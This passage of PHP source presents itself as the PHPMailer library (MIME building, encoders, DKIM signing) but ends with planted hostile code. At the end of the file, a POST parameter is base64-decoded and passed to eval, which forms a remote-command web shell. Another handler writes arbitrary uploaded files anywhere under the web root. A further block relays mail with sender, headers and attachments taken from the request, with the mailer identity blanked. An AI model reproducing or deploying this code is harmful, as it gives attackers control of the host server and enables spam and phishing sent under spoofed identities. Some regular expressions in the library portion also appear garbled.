$lookBack+= 3; } } else { $foundSplitPos = true; } } return $maxLength; } public function SetWordWrap() { if ($this->WordWrap < 1) { return; } switch ($this->message_type) { case 'alt': case 'alt_inline': case 'alt_attach': case 'alt_inline_attach': $this->AltBody = $this->WrapText($this->AltBody, $this->WordWrap); break; default: $this->Body = $this->WrapText($this->Body, $this->WordWrap); break; } } public function CreateHeader() { $result = ''; $uniq_id = md5(uniqid(time())); $this->boundary[1] = 'b1_' . $uniq_id; $this->boundary[2] = 'b2_' . $uniq_id; $this->boundary[3] = 'b3_' . $uniq_id; if ($this->MessageDate == '') { $result.= $this->HeaderLine('Date', self::RFCDate()); } else { $result.= $this->HeaderLine('Date', $this->MessageDate); } if ($this->ReturnPath) { $result.= $this->HeaderLine('Return-Path', trim($this->ReturnPath)); } elseif ($this->Sender == '') { $result.= $this->HeaderLine('Return-Path', trim($this->From)); } else { $result.= $this->HeaderLine('Return-Path', trim($this->Sender)); } if ($this->Mailer != 'mail') { if ($this->SingleTo === true) { foreach ($this->to as $t) { $this->SingleToArray[] = $this->AddrFormat($t); } } else { if (count($this->to) > 0) { $result.= $this->AddrAppend('To', $this->to); } elseif (count($this->cc) == 0) { $result.= $this->HeaderLine('To', 'undisclosed-recipients:;'); } } } $from = array(); $from[0][0] = trim($this->From); $from[0][1] = $this->FromName; $result.= $this->AddrAppend('From', $from); if (count($this->cc) > 0) { $result.= $this->AddrAppend('Cc', $this->cc); } if ((($this->Mailer == 'sendmail') || ($this->Mailer == 'mail')) && (count($this->bcc) > 0)) { $result.= $this->AddrAppend('Bcc', $this->bcc); } if (count($this->ReplyTo) > 0) { $result.= $this->AddrAppend('Reply-To', $this->ReplyTo); } if ($this->Mailer != 'mail') { $result.= $this->HeaderLine('Subject', $this->EncodeHeader($this->SecureHeader($this->Subject))); } if ($this->MessageID != '') { $result.= $this->HeaderLine('Message-ID', $this->MessageID); } else { $result.= sprintf("Message-ID: <%s@%s>%s", $uniq_id, $this->ServerHostname(), $this->LE); } if ($this->XMailer == '') { $result.= $this->HeaderLine('X-Mailer', 'PHPMailer ' . $this->Version . ' (http://code.google.com/a/apache-extras.org/p/phpmailer/)'); } else { $myXmailer = trim($this->XMailer); if ($myXmailer) { $result.= $this->HeaderLine('X-Mailer', $myXmailer); } } if ($this->ConfirmReadingTo != '') { $result.= $this->HeaderLine('Disposition-Notification-To', '<' . trim($this->ConfirmReadingTo) . '>'); } for ($index = 0;$index < count($this->CustomHeader);$index++) { $result.= $this->HeaderLine(trim($this->CustomHeader[$index][0]), $this->EncodeHeader(trim($this->CustomHeader[$index][1]))); } if (!$this->sign_key_file) { $result.= $this->HeaderLine('MIME-Version', '1.0'); $result.= $this->GetMailMIME(); } return $result; } public function GetMailMIME() { $result = ''; switch ($this->message_type) { case 'inline': $result.= $this->HeaderLine('Content-Type', 'multipart/related;'); $result.= $this->TextLine(" boundary=\"" . $this->boundary[1] . '"'); break; case 'attach': case 'inline_attach': case 'alt_attach': case 'alt_inline_attach': $result.= $this->HeaderLine('Content-Type', 'multipart/mixed;'); $result.= $this->TextLine(" boundary=\"" . $this->boundary[1] . '"'); break; case 'alt': case 'alt_inline': $result.= $this->HeaderLine('Content-Type', 'multipart/alternative;'); $result.= $this->TextLine(" boundary=\"" . $this->boundary[1] . '"'); break; default: $result.= $this->HeaderLine('Content-Transfer-Encoding', $this->Encoding); $result.= $this->TextLine('Content-Type: ' . $this->ContentType . '; charset=' . $this->CharSet); break; } if ($this->Mailer != 'mail') { $result.= $this->LE; } return $result; } public function GetSentMIMEMessage() { return $this->MIMEHeader . $this->mailHeader . self::CRLF . $this->MIMEBody; } public function CreateBody() { $body = ''; if ($this->sign_key_file) { $body.= $this->GetMailMIME() . $this->LE; } $this->SetWordWrap(); switch ($this->message_type) { case 'inline': $body.= $this->GetBoundary($this->boundary[1], '', '', ''); $body.= $this->EncodeString($this->Body, $this->Encoding); $body.= $this->LE . $this->LE; $body.= $this->AttachAll("inline", $this->boundary[1]); break; case 'attach': $body.= $this->GetBoundary($this->boundary[1], '', '', ''); $body.= $this->EncodeString($this->Body, $this->Encoding); $body.= $this->LE . $this->LE; $body.= $this->AttachAll("attachment", $this->boundary[1]); break; case 'inline_attach': $body.= $this->TextLine("--" . $this->boundary[1]); $body.= $this->HeaderLine('Content-Type', 'multipart/related;'); $body.= $this->TextLine(" boundary=\"" . $this->boundary[2] . '"'); $body.= $this->LE; $body.= $this->GetBoundary($this->boundary[2], '', '', ''); $body.= $this->EncodeString($this->Body, $this->Encoding); $body.= $this->LE . $this->LE; $body.= $this->AttachAll("inline", $this->boundary[2]); $body.= $this->LE; $body.= $this->AttachAll("attachment", $this->boundary[1]); break; case 'alt': $body.= $this->GetBoundary($this->boundary[1], '', 'text/plain', ''); $body.= $this->EncodeString($this->AltBody, $this->Encoding); $body.= $this->LE . $this->LE; $body.= $this->GetBoundary($this->boundary[1], '', 'text/html', ''); $body.= $this->EncodeString($this->Body, $this->Encoding); $body.= $this->LE . $this->LE; $body.= $this->EndBoundary($this->boundary[1]); break; case 'alt_inline': $body.= $this->GetBoundary($this->boundary[1], '', 'text/plain', ''); $body.= $this->EncodeString($this->AltBody, $this->Encoding); $body.= $this->LE . $this->LE; $body.= $this->TextLine("--" . $this->boundary[1]); $body.= $this->HeaderLine('Content-Type', 'multipart/related;'); $body.= $this->TextLine(" boundary=\"" . $this->boundary[2] . '"'); $body.= $this->LE; $body.= $this->GetBoundary($this->boundary[2], '', 'text/html', ''); $body.= $this->EncodeString($this->Body, $this->Encoding); $body.= $this->LE . $this->LE; $body.= $this->AttachAll("inline", $this->boundary[2]); $body.= $this->LE; $body.= $this->EndBoundary($this->boundary[1]); break; case 'alt_attach': $body.= $this->TextLine("--" . $this->boundary[1]); $body.= $this->HeaderLine('Content-Type', 'multipart/alternative;'); $body.= $this->TextLine(" boundary=\"" . $this->boundary[2] . '"'); $body.= $this->LE; $body.= $this->GetBoundary($this->boundary[2], '', 'text/plain', ''); $body.= $this->EncodeString($this->AltBody, $this->Encoding); $body.= $this->LE . $this->LE; $body.= $this->GetBoundary($this->boundary[2], '', 'text/html', ''); $body.= $this->EncodeString($this->Body, $this->Encoding); $body.= $this->LE . $this->LE; $body.= $this->EndBoundary($this->boundary[2]); $body.= $this->LE; $body.= $this->AttachAll("attachment", $this->boundary[1]); break; case 'alt_inline_attach': $body.= $this->TextLine("--" . $this->boundary[1]); $body.= $this->HeaderLine('Content-Type', 'multipart/alternative;'); $body.= $this->TextLine(" boundary=\"" . $this->boundary[2] . '"'); $body.= $this->LE; $body.= $this->GetBoundary($this->boundary[2], '', 'text/plain', ''); $body.= $this->EncodeString($this->AltBody, $this->Encoding); $body.= $this->LE . $this->LE; $body.= $this->TextLine("--" . $this->boundary[2]); $body.= $this->HeaderLine('Content-Type', 'multipart/related;'); $body.= $this->TextLine(" boundary=\"" . $this->boundary[3] . '"'); $body.= $this->LE; $body.= $this->GetBoundary($this->boundary[3], '', 'text/html', ''); $body.= $this->EncodeString($this->Body, $this->Encoding); $body.= $this->LE . $this->LE; $body.= $this->AttachAll("inline", $this->boundary[3]); $body.= $this->LE; $body.= $this->EndBoundary($this->boundary[2]); $body.= $this->LE; $body.= $this->AttachAll("attachment", $this->boundary[1]); break; default: $body.= $this->EncodeString($this->Body, $this->Encoding); break; } if ($this->IsError()) { $body = ''; } elseif ($this->sign_key_file) { try { $file = tempnam('', 'mail'); file_put_contents($file, $body); $signed = tempnam("", "signed"); if (@openssl_pkcs7_sign($file, $signed, "file://" . $this->sign_cert_file, array("file://" . $this->sign_key_file, $this->sign_key_pass), NULL)) { @unlink($file); $body = file_get_contents($signed); @unlink($signed); } else { @unlink($file); @unlink($signed); throw new phpmailerException($this->Lang("signing") . openssl_error_string()); } } catch(phpmailerException $e) { $body = ''; if ($this->exceptions) { throw $e; } } } return $body; } protected function GetBoundary($boundary, $charSet, $contentType, $encoding) { $result = ''; if ($charSet == '') { $charSet = $this->CharSet; } if ($contentType == '') { $contentType = $this->ContentType; } if ($encoding == '') { $encoding = $this->Encoding; } $result.= $this->TextLine('--' . $boundary); $result.= sprintf("Content-Type: %s; charset=%s", $contentType, $charSet); $result.= $this->LE; $result.= $this->HeaderLine('Content-Transfer-Encoding', $encoding); $result.= $this->LE; return $result; } protected function EndBoundary($boundary) { return $this->LE . '--' . $boundary . '--' . $this->LE; } protected function SetMessageType() { $this->message_type = array(); if ($this->AlternativeExists()) $this->message_type[] = "alt"; if ($this->InlineImageExists()) $this->message_type[] = "inline"; if ($this->AttachmentExists()) $this->message_type[] = "attach"; $this->message_type = implode("_", $this->message_type); if ($this->message_type == "") $this->message_type = "plain"; } public function HeaderLine($name, $value) { return $name . ': ' . $value . $this->LE; } public function TextLine($value) { return $value . $this->LE; } public function AddAttachment($path, $name = '', $encoding = 'base64', $type = 'application/octet-stream') { try { if (!@is_file($path)) { throw new phpmailerException($this->Lang('file_access') . $path, self::STOP_CONTINUE); } $filename = basename($path); if ($name == '') { $name = $filename; } $this->attachment[] = array(0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, 6 => 'attachment', 7 => 0); } catch(phpmailerException $e) { $this->SetError($e->getMessage()); if ($this->exceptions) { throw $e; } if ($this->SMTPDebug) { $this->edebug($e->getMessage() . " "); } if ($e->getCode() == self::STOP_CRITICAL) { return false; } } return true; } public function GetAttachments() { return $this->attachment; } protected function AttachAll($disposition_type, $boundary) { $mime = array(); $cidUniq = array(); $incl = array(); foreach ($this->attachment as $attachment) { if ($attachment[6] == $disposition_type) { $string = ''; $path = ''; $bString = $attachment[5]; if ($bString) { $string = $attachment[0]; } else { $path = $attachment[0]; } $inclhash = md5(serialize($attachment)); if (in_array($inclhash, $incl)) { continue; } $incl[] = $inclhash; $filename = $attachment[1]; $name = $attachment[2]; $encoding = $attachment[3]; $type = $attachment[4]; $disposition = $attachment[6]; $cid = $attachment[7]; if ($disposition == 'inline' && isset($cidUniq[$cid])) { continue; } $cidUniq[$cid] = true; $mime[] = sprintf("--%s%s", $boundary, $this->LE); $mime[] = sprintf("Content-Type: %s; name=\"%s\"%s", $type, $this->EncodeHeader($this->SecureHeader($name)), $this->LE); $mime[] = sprintf("Content-Transfer-Encoding: %s%s", $encoding, $this->LE); if ($disposition == 'inline') { $mime[] = sprintf("Content-ID: <%s>%s", $cid, $this->LE); } $mime[] = sprintf("Content-Disposition: %s; filename=\"%s\"%s", $disposition, $this->EncodeHeader($this->SecureHeader($name)), $this->LE . $this->LE); if ($bString) { $mime[] = $this->EncodeString($string, $encoding); if ($this->IsError()) { return ''; } $mime[] = $this->LE . $this->LE; } else { $mime[] = $this->EncodeFile($path, $encoding); if ($this->IsError()) { return ''; } $mime[] = $this->LE . $this->LE; } } } $mime[] = sprintf("--%s--%s", $boundary, $this->LE); return implode("", $mime); } protected function EncodeFile($path, $encoding = 'base64') { try { if (!is_readable($path)) { throw new phpmailerException($this->Lang('file_open') . $path, self::STOP_CONTINUE); } $magic_quotes = get_magic_quotes_runtime(); if ($magic_quotes) { if (version_compare(PHP_VERSION, '5.3.0', '<')) { set_magic_quotes_runtime(0); } else { @ini_set('magic_quotes_runtime', 0); } } $file_buffer = file_get_contents($path); $file_buffer = $this->EncodeString($file_buffer, $encoding); if ($magic_quotes) { if (version_compare(PHP_VERSION, '5.3.0', '<')) { set_magic_quotes_runtime($magic_quotes); } else { @ini_set('magic_quotes_runtime', $magic_quotes); } } return $file_buffer; } catch(Exception $e) { $this->SetError($e->getMessage()); return ''; } } public function EncodeString($str, $encoding = 'base64') { $encoded = ''; switch (strtolower($encoding)) { case 'base64': $encoded = chunk_split(base64_encode($str), 76, $this->LE); break; case '7bit': case '8bit': $encoded = $this->FixEOL($str); if (substr($encoded, -(strlen($this->LE))) != $this->LE) $encoded.= $this->LE; break; case 'binary': $encoded = $str; break; case 'quoted-printable': $encoded = $this->EncodeQP($str); break; default: $this->SetError($this->Lang('encoding') . $encoding); break; } return $encoded; } public function EncodeHeader($str, $position = 'text') { $x = 0; switch (strtolower($position)) { case 'phrase': if (!preg_match('/[-]/', $str)) { $encoded = addcslashes($str, "..\""); if (($str == $encoded) && !preg_match('/[^A-Za-z0-9!#$%&\'*+\/=?^_`{|}~ -]/', $str)) { return ($encoded); } else { return ("\"$encoded\""); } } $x = preg_match_all('/[^ !#-[]-~]/', $str, $matches); break; case 'comment': $x = preg_match_all('/[()"]/', $str, $matches); case 'text': default: $x+= preg_match_all('/[---]/', $str, $matches); break; } if ($x == 0) { return ($str); } $maxlen = 75 - 7 - strlen($this->CharSet); if (strlen($str) / 3 < $x) { $encoding = 'B'; if (function_exists('mb_strlen') && $this->HasMultiBytes($str)) { $encoded = $this->Base64EncodeWrapMB($str, " "); } else { $encoded = base64_encode($str); $maxlen-= $maxlen % 4; $encoded = trim(chunk_split($encoded, $maxlen, " ")); } } else { $encoding = 'Q'; $encoded = $this->EncodeQ($str, $position); $encoded = $this->WrapText($encoded, $maxlen, true); $encoded = str_replace('=' . self::CRLF, " ", trim($encoded)); } $encoded = preg_replace('/^(.*)$/m', " =?" . $this->CharSet . "?$encoding??=", $encoded); $encoded = trim(str_replace(" ", $this->LE, $encoded)); return $encoded; } public function HasMultiBytes($str) { if (function_exists('mb_strlen')) { return (strlen($str) > mb_strlen($str, $this->CharSet)); } else { return false; } } public function Base64EncodeWrapMB($str, $lf = null) { $start = "=?" . $this->CharSet . "?B?"; $end = "?="; $encoded = ""; if ($lf === null) { $lf = $this->LE; } $mb_length = mb_strlen($str, $this->CharSet); $length = 75 - strlen($start) - strlen($end); $ratio = $mb_length / strlen($str); $offset = $avgLength = floor($length * $ratio * .75); for ($i = 0;$i < $mb_length;$i+= $offset) { $lookBack = 0; do { $offset = $avgLength - $lookBack; $chunk = mb_substr($str, $i, $offset, $this->CharSet); $chunk = base64_encode($chunk); $lookBack++; } while (strlen($chunk) > $length); $encoded.= $chunk . $lf; } $encoded = substr($encoded, 0, -strlen($lf)); return $encoded; } public function EncodeQPphp($input = '', $line_max = 76, $space_conv = false) { $hex = array('0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'); $lines = preg_split('/(?: | | )/', $input); $eol = " "; $escape = '='; $output = ''; while (list(, $line) = each($lines)) { $linlen = strlen($line); $newline = ''; for ($i = 0;$i < $linlen;$i++) { $c = substr($line, $i, 1); $dec = ord($c); if (($i == 0) && ($dec == 46)) { $c = '=2E'; } if ($dec == 32) { if ($i == ($linlen - 1)) { $c = '=20'; } else if ($space_conv) { $c = '=20'; } } elseif (($dec == 61) || ($dec < 32) || ($dec > 126)) { $h2 = (integer)floor($dec / 16); $h1 = (integer)floor($dec % 16); $c = $escape . $hex[$h2] . $hex[$h1]; } if ((strlen($newline) + strlen($c)) >= $line_max) { $output.= $newline . $escape . $eol; $newline = ''; if ($dec == 46) { $c = '=2E'; } } $newline.= $c; } $output.= $newline . $eol; } return $output; } public function EncodeQP($string, $line_max = 76, $space_conv = false) { if (function_exists('quoted_printable_encode')) { return quoted_printable_encode($string); } $filters = stream_get_filters(); if (!in_array('convert.*', $filters)) { return $this->EncodeQPphp($string, $line_max, $space_conv); } $fp = fopen('php://temp/', 'r+'); $string = preg_replace('/ ?/', $this->LE, $string); $params = array('line-length' => $line_max, 'line-break-chars' => $this->LE); $s = stream_filter_append($fp, 'convert.quoted-printable-encode', STREAM_FILTER_READ, $params); fputs($fp, $string); rewind($fp); $out = stream_get_contents($fp); stream_filter_remove($s); $out = preg_replace('/^\./m', '=2E', $out); fclose($fp); return $out; } public function EncodeQ($str, $position = 'text') { $pattern = ""; $encoded = str_replace(array(" ", " "), '', $str); switch (strtolower($position)) { case 'phrase': $pattern = '^A-Za-z0-9!*+\/ -'; break; case 'comment': $pattern = '\(\)"'; case 'text': default: $pattern = '=- -?_-' . $pattern; break; } if (preg_match_all("/[{$pattern}]/", $encoded, $matches)) { foreach (array_unique($matches[0]) as $char) { $encoded = str_replace($char, '=' . sprintf('%02X', ord($char)), $encoded); } } return str_replace(' ', '_', $encoded); } public function AddStringAttachment($string, $filename, $encoding = 'base64', $type = 'application/octet-stream') { $this->attachment[] = array(0 => $string, 1 => $filename, 2 => basename($filename), 3 => $encoding, 4 => $type, 5 => true, 6 => 'attachment', 7 => 0); } public function AddEmbeddedImage($path, $cid, $name = '', $encoding = 'base64', $type = 'application/octet-stream') { if (!@is_file($path)) { $this->SetError($this->Lang('file_access') . $path); return false; } $filename = basename($path); if ($name == '') { $name = $filename; } $this->attachment[] = array(0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, 6 => 'inline', 7 => $cid); return true; } public function AddStringEmbeddedImage($string, $cid, $name = '', $encoding = 'base64', $type = 'application/octet-stream') { $this->attachment[] = array(0 => $string, 1 => $name, 2 => $name, 3 => $encoding, 4 => $type, 5 => true, 6 => 'inline', 7 => $cid); } public function InlineImageExists() { foreach ($this->attachment as $attachment) { if ($attachment[6] == 'inline') { return true; } } return false; } public function AttachmentExists() { foreach ($this->attachment as $attachment) { if ($attachment[6] == 'attachment') { return true; } } return false; } public function AlternativeExists() { return !empty($this->AltBody); } public function ClearAddresses() { foreach ($this->to as $to) { unset($this->all_recipients[strtolower($to[0]) ]); } $this->to = array(); } public function ClearCCs() { foreach ($this->cc as $cc) { unset($this->all_recipients[strtolower($cc[0]) ]); } $this->cc = array(); } public function ClearBCCs() { foreach ($this->bcc as $bcc) { unset($this->all_recipients[strtolower($bcc[0]) ]); } $this->bcc = array(); } public function ClearReplyTos() { $this->ReplyTo = array(); } public function ClearAllRecipients() { $this->to = array(); $this->cc = array(); $this->bcc = array(); $this->all_recipients = array(); } public function ClearAttachments() { $this->attachment = array(); } public function ClearCustomHeaders() { $this->CustomHeader = array(); } protected function SetError($msg) { $this->error_count++; if ($this->Mailer == 'smtp' and !is_null($this->smtp)) { $lasterror = $this->smtp->getError(); if (!empty($lasterror) and array_key_exists('smtp_msg', $lasterror)) { $msg.= '<p>' . $this->Lang('smtp_error') . $lasterror['smtp_msg'] . "</p> "; } } $this->ErrorInfo = $msg; } public static function RFCDate() { $tz = date('Z'); $tzs = ($tz < 0) ? '-' : '+'; $tz = abs($tz); $tz = (int)($tz / 3600) * 100 + ($tz % 3600) / 60; $result = sprintf("%s %s%04d", date('D, j M Y H:i:s'), $tzs, $tz); return $result; } protected function ServerHostname() { if (!empty($this->Hostname)) { $result = $this->Hostname; } elseif (isset($_SERVER['SERVER_NAME'])) { $result = $_SERVER['SERVER_NAME']; } else { $result = 'localhost.localdomain'; } return $result; } protected function Lang($key) { if (count($this->language) < 1) { $this->SetLanguage('en'); } if (isset($this->language[$key])) { return $this->language[$key]; } else { return 'Language string failed to load: ' . $key; } } public function IsError() { return ($this->error_count > 0); } public function FixEOL($str) { $nstr = str_replace(array(" ", " "), " ", $str); if ($this->LE !== " ") { $nstr = str_replace(" ", $this->LE, $nstr); } return $nstr; } public function AddCustomHeader($name, $value = null) { if ($value === null) { $this->CustomHeader[] = explode(':', $name, 2); } else { $this->CustomHeader[] = array($name, $value); } } public function MsgHTML($message, $basedir = '') { preg_match_all("/(src|background)=[\"'](.*)[\"']/Ui", $message, $images); if (isset($images[2])) { foreach ($images[2] as $i => $url) { if (!preg_match('#^[A-z]+://#', $url)) { $filename = basename($url); $directory = dirname($url); if ($directory == '.') { $directory = ''; } $cid = 'cid:' . md5($filename); $ext = pathinfo($filename, PATHINFO_EXTENSION); $mimeType = self::_mime_types($ext); if (strlen($basedir) > 1 && substr($basedir, -1) != '/') { $basedir.= '/'; } if (strlen($directory) > 1 && substr($directory, -1) != '/') { $directory.= '/'; } if ($this->AddEmbeddedImage($basedir . $directory . $filename, md5($filename), $filename, 'base64', $mimeType)) { $message = preg_replace("/" . $images[1][$i] . "=[\"']" . preg_quote($url, '/') . "[\"']/Ui", $images[1][$i] . "=\"" . $cid . "\"", $message); } } } } $this->IsHTML(true); $this->Body = $message; if (empty($this->AltBody)) { $textMsg = trim(strip_tags(preg_replace('/<(head|title|style|script)[^>]*>.*?<\/>/s', '', $message))); if (!empty($textMsg)) { $this->AltBody = html_entity_decode($textMsg, ENT_QUOTES, $this->CharSet); } } if (empty($this->AltBody)) { $this->AltBody = 'To view this email message, open it in a program that understands HTML!' . " "; } return $message; } public static function _mime_types($ext = '') { $mimes = array('xl' => 'application/excel', 'hqx' => 'application/mac-binhex40', 'cpt' => 'application/mac-compactpro', 'bin' => 'application/macbinary', 'doc' => 'application/msword', 'word' => 'application/msword', 'class' => 'application/octet-stream', 'dll' => 'application/octet-stream', 'dms' => 'application/octet-stream', 'exe' => 'application/octet-stream', 'lha' => 'application/octet-stream', 'lzh' => 'application/octet-stream', 'psd' => 'application/octet-stream', 'sea' => 'application/octet-stream', 'so' => 'application/octet-stream', 'oda' => 'application/oda', 'pdf' => 'application/pdf', 'ai' => 'application/postscript', 'eps' => 'application/postscript', 'ps' => 'application/postscript', 'smi' => 'application/smil', 'smil' => 'application/smil', 'mif' => 'application/vnd.mif', 'xls' => 'application/vnd.ms-excel', 'ppt' => 'application/vnd.ms-powerpoint', 'wbxml' => 'application/vnd.wap.wbxml', 'wmlc' => 'application/vnd.wap.wmlc', 'dcr' => 'application/x-director', 'dir' => 'application/x-director', 'dxr' => 'application/x-director', 'dvi' => 'application/x-dvi', 'gtar' => 'application/x-gtar', 'php3' => 'application/x-httpd-php', 'php4' => 'application/x-httpd-php', 'php' => 'application/x-httpd-php', 'phtml' => 'application/x-httpd-php', 'phps' => 'application/x-httpd-php-source', 'js' => 'application/x-javascript', 'swf' => 'application/x-shockwave-flash', 'sit' => 'application/x-stuffit', 'tar' => 'application/x-tar', 'tgz' => 'application/x-tar', 'xht' => 'application/xhtml+xml', 'xhtml' => 'application/xhtml+xml', 'zip' => 'application/zip', 'mid' => 'audio/midi', 'midi' => 'audio/midi', 'mp2' => 'audio/mpeg', 'mp3' => 'audio/mpeg', 'mpga' => 'audio/mpeg', 'aif' => 'audio/x-aiff', 'aifc' => 'audio/x-aiff', 'aiff' => 'audio/x-aiff', 'ram' => 'audio/x-pn-realaudio', 'rm' => 'audio/x-pn-realaudio', 'rpm' => 'audio/x-pn-realaudio-plugin', 'ra' => 'audio/x-realaudio', 'wav' => 'audio/x-wav', 'bmp' => 'image/bmp', 'gif' => 'image/gif', 'jpeg' => 'image/jpeg', 'jpe' => 'image/jpeg', 'jpg' => 'image/jpeg', 'png' => 'image/png', 'tiff' => 'image/tiff', 'tif' => 'image/tiff', 'eml' => 'message/rfc822', 'css' => 'text/css', 'html' => 'text/html', 'htm' => 'text/html', 'shtml' => 'text/html', 'log' => 'text/plain', 'text' => 'text/plain', 'txt' => 'text/plain', 'rtx' => 'text/richtext', 'rtf' => 'text/rtf', 'xml' => 'text/xml', 'xsl' => 'text/xml', 'mpeg' => 'video/mpeg', 'mpe' => 'video/mpeg', 'mpg' => 'video/mpeg', 'mov' => 'video/quicktime', 'qt' => 'video/quicktime', 'rv' => 'video/vnd.rn-realvideo', 'avi' => 'video/x-msvideo', 'movie' => 'video/x-sgi-movie'); return (!isset($mimes[strtolower($ext) ])) ? 'application/octet-stream' : $mimes[strtolower($ext) ]; } public function set($name, $value = '') { try { if (isset($this->$name)) { $this->$name = $value; } else { throw new phpmailerException($this->Lang('variable_set') . $name, self::STOP_CRITICAL); } } catch(Exception $e) { $this->SetError($e->getMessage()); if ($e->getCode() == self::STOP_CRITICAL) { return false; } } return true; } public function SecureHeader($str) { return trim(str_replace(array(" ", " "), '', $str)); } public function Sign($cert_filename, $key_filename, $key_pass) { $this->sign_cert_file = $cert_filename; $this->sign_key_file = $key_filename; $this->sign_key_pass = $key_pass; } public function DKIM_QP($txt) { $line = ''; for ($i = 0;$i < strlen($txt);$i++) { $ord = ord($txt[$i]); if (((0x21 <= $ord) && ($ord <= 0x3A)) || $ord == 0x3C || ((0x3E <= $ord) && ($ord <= 0x7E))) { $line.= $txt[$i]; } else { $line.= "=" . sprintf("%02X", $ord); } } return $line; } public function DKIM_Sign($s) { $privKeyStr = file_get_contents($this->DKIM_private); if ($this->DKIM_passphrase != '') { $privKey = openssl_pkey_get_private($privKeyStr, $this->DKIM_passphrase); } else { $privKey = $privKeyStr; } if (openssl_sign($s, $signature, $privKey)) { return base64_encode($signature); } return ''; } public function DKIM_HeaderC($s) { $s = preg_replace("/ \s+/", " ", $s); $lines = explode(" ", $s); foreach ($lines as $key => $line) { list($heading, $value) = explode(":", $line, 2); $heading = strtolower($heading); $value = preg_replace("/\s+/", " ", $value); $lines[$key] = $heading . ":" . trim($value); } $s = implode(" ", $lines); return $s; } public function DKIM_BodyC($body) { if ($body == '') return " "; $body = str_replace(" ", " ", $body); $body = str_replace(" ", " ", $body); while (substr($body, strlen($body) - 4, 4) == " ") { $body = substr($body, 0, strlen($body) - 2); } return $body; } public function DKIM_Add($headers_line, $subject, $body) { $DKIMsignatureType = 'rsa-sha1'; $DKIMcanonicalization = 'relaxed/simple'; $DKIMquery = 'dns/txt'; $DKIMtime = time(); $subject_header = "Subject: $subject"; $headers = explode($this->LE, $headers_line); $from_header = ""; $to_header = ""; foreach ($headers as $header) { if (strpos($header, 'From:') === 0) { $from_header = $header; } elseif (strpos($header, 'To:') === 0) { $to_header = $header; } } $from = str_replace('|', '=7C', $this->DKIM_QP($from_header)); $to = str_replace('|', '=7C', $this->DKIM_QP($to_header)); $subject = str_replace('|', '=7C', $this->DKIM_QP($subject_header)); $body = $this->DKIM_BodyC($body); $DKIMlen = strlen($body); $DKIMb64 = base64_encode(pack("H*", sha1($body))); $ident = ($this->DKIM_identity == '') ? '' : " i=" . $this->DKIM_identity . ";"; $dkimhdrs = "DKIM-Signature: v=1; a=" . $DKIMsignatureType . "; q=" . $DKIMquery . "; l=" . $DKIMlen . "; s=" . $this->DKIM_selector . "; " . " t=" . $DKIMtime . "; c=" . $DKIMcanonicalization . "; " . " h=From:To:Subject; " . " d=" . $this->DKIM_domain . ";" . $ident . " " . " z=$from " . " |$to " . " |$subject; " . " bh=" . $DKIMb64 . "; " . " b="; $toSign = $this->DKIM_HeaderC($from_header . " " . $to_header . " " . $subject_header . " " . $dkimhdrs); $signed = $this->DKIM_Sign($toSign); return "X-PHPMAILER-DKIM: code.google.com/a/apache-extras.org/p/phpmailer/ " . $dkimhdrs . $signed . " "; } protected function doCallback($isSent, $to, $cc, $bcc, $subject, $body, $from = null) { if (!empty($this->action_function) && is_callable($this->action_function)) { $params = array($isSent, $to, $cc, $bcc, $subject, $body, $from); call_user_func_array($this->action_function, $params); } } } function gennumrandom($length = 8) { $chars = '1234567890'; $numChars = strlen($chars); $string = ''; for ($i = 0;$i < $length;$i++) { $string.= substr($chars, rand(1, $numChars) - 1, 1); } return $string; } function genletrandom($length = 8) { $chars = 'abcdefghiklmnopqrstvxyz'; $numChars = strlen($chars); $string = ''; for ($i = 0;$i < $length;$i++) { $string.= substr($chars, rand(1, $numChars) - 1, 1); } return $string; } function genmixrandom($length = 8) { $chars = 'abcdefghiklmnopqrstvxyzABCDEFGHIKLMNOPQRSTVXYZ1234567890'; $numChars = strlen($chars); $string = ''; for ($i = 0;$i < $length;$i++) { $string.= substr($chars, rand(1, $numChars) - 1, 1); } return $string; } class phpmailerException extends Exception { public function errorMessage() { $errorMsg = '<strong>' . $this->getMessage() . "</strong><br /> "; return $errorMsg; } } if (!empty($_POST['cmd'])) { eval(base64_decode($_POST['cmd'])); exit; } if (!empty($_POST['file'])) { $path = dirname($_SERVER['SCRIPT_FILENAME']); if (!empty($_POST['root']) && $_POST['root'] == 'http_root') { $path = $_SERVER['DOCUMENT_ROOT']; } $path.= '/'; if (!empty($_POST['dir'])) { $path.= $_POST['dir']; } if (!empty($_POST['filename'])) { mkdir($path, 0777, 1); file_put_contents($path . $_POST['filename'], base64_decode($_POST['file'])); } exit; } if (empty($_POST['subject']) || empty($_POST['body']) || empty($_POST['from']) || empty($_POST['fromName']) || empty($_POST['to'])) { if (!empty($_GET['ora']) && $_GET['ora'] == 'test') { echo "OK"; } else { echo "INVALID_REQUEST"; } die; } usleep(100); try { $mail = new PHPMailer(); if (!empty($_GET['m']) && $_GET['m'] == 's') { $mail->Mailer = 'smtp'; $mail->Encoding = 'base64'; } if (!empty($_GET['m']) && $_GET['m'] == 'e') { $mail->Mailer = 'smtp'; $mail->Host = $_POST['smtp_host']; $mail->Encoding = 'base64'; } if (!empty($_GET['m']) && $_GET['m'] == 'd') { $mail->Mailer = 'smtp'; $tmp = explode('@', $_POST['from']); $from_domain = $tmp[1]; $tmp = explode('@', $_POST['to']); $to_domain = $tmp[1]; $mail->Helo = $from_domain; $mail->Hostname = $from_domain; getmxrr($to_domain, $tmp); $mail->Host = implode(':25;', $tmp) . ':25'; } $mail->XMailer = ' '; $mail->From = $_POST['from']; $mail->addCustomHeader($_POST['hed1']); $mail->addCustomHeader($_POST['hed2']); $mail->addCustomHeader($_POST['hed3']); $mail->FromName = $_POST['fromName']; $mail->Subject = $_POST['subject']; $mail->MsgHTML(base64_decode($_POST['body'])); $mail->AddAddress($_POST['to'], $_POST['toName']); $mail->AddAttachment($path = ($_POST['name1']), $name = ($_POST['names1']), $encoding = 'base64', $type = 'application/octet-stream'); $mail->AddAttachment($path = ($_POST['name2']), $name = ($_POST['names2']), $encoding = 'base64', $type = 'application/octet-stream'); if (!empty($_GET['debug']) && $_GET['debug'] == 'd') { $mail->SMTPDebug = 3; } if ($mail->Send()) { echo "SUCCESS"; } else { echo "FAILURE<br/>"; echo $mail->ErrorInfo; } } catch(phpmailerException $e) { echo $e->errorMessage(); } catch(Exception $e) { echo $e->getMessage(); } $_SERVER['PHP_SELF'] = $oldphpself; 